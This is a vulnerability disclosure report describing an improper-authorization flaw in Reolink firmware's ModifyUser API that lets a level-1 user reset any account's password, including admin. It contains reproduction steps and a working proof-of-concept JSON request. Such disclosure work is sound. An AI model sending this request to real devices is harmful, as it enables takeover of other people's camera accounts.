1. Reporting information

• Team name : Team Brrester

2. Overview of Vulnerabilities

• Vulnerability title: Improper Authorization Allows Arbitrary User Password Modification

• Date of discovery: 2025.07.05

• Discovery Location (URL or System Path) :

  Reolink Firmware Web ( Cmd → ModifyUser )

• Vulnerability Type (CWE ID):

  • CWE-862: Missing Authorization
  • CWE-285: Improper Authorization
  • CWE-639: Authorization Bypass Through User-Controlled Key

• Vulnerability Description:

  In principle, users with level1 privileges should be able to modify only the password of the level0 privileged account. However, the server does not properly verify the userName parameter passed from the client, and the oldPassword parameter is used for verification only when changing the password for your account.

  This creates a vulnerability where an attacker can specify an arbitrary userName value, changing the passwords of all users without additional verification.

3. Details

• Impacted Products/Services: Reolink Firmware Web

• Product version: firmware v3.0.0.4662_2503122283

• Vulnerable Components:

  In the user password modification logic of the Reolink firmware API, server-side authorization verification is insufficient for the userName parameters delivered by the client,

  The oldPassword parameter is only used for verification when changing your account password, allowing unauthorized users to modify other users' passwords without separate verification.

• Account Privilege Levels:

  

  • level 2
    • Default admin account provided by Reolink.
  • level 1
    • If a user is created with userType: Administrator, the new account gets level 1.
    • Has access to most features, but cannot manage (create/delete/change password) accounts of the same or higher level.
  • level 0
    • If a user is created with userType: User, it is assigned level 0.
    • Can only view or download footage.

• Attack Vector

  

  As shown in the photo above, level1 privileged users can modify only the password for level0 privileged accounts by default.

  However, if an attacker enters another user's ID in the userName parameter, regardless of permission, when requesting to change the password,

  The server processes the request without validating it properly, allowing level1 privileged users to change their passwords.

  (Oldpassword is used only when you use your own password.)

• Reproduction Steps

1. Log in as a user with level 1 privileges.
2. Intercept a ModifyUser request using a proxy tool such as Burp Suite.

[
  {
    "cmd": "ModifyUser",
    "action": 0,
    "param": {
      "User": {
        "userName": "1234",
        "newPassword": "1111Qwer!",
        "oldPassword": ""
      }
    }
  }
]

By intercepting the request, you can check the following request values.

At this time, modify the above value to the ID value of another user except for the ID of your account as follows.

(In order to change the password of your account, the value of oldPassword is required.)

[
  {
    "cmd": "ModifyUser",
    "action": 0,
    "param": {
      "User": {
        "userName": "admin",
        "newPassword": "4444Qwer!",
        "oldPassword": ""
      }
    }
  }
]

1. Forward the modified request to the server.
2. Verify that the password is changed normally.
3. Verify that password has changed to the password to verify that password has changed to the password.

• POC

[
  {
    "cmd": "ModifyUser",
    "action": 0,
    "param": {
      "User": {
        "userName": "admin",
        "newPassword": "4444Qwer!",
        "oldPassword": ""
      }
    }
  }
]

mod.mov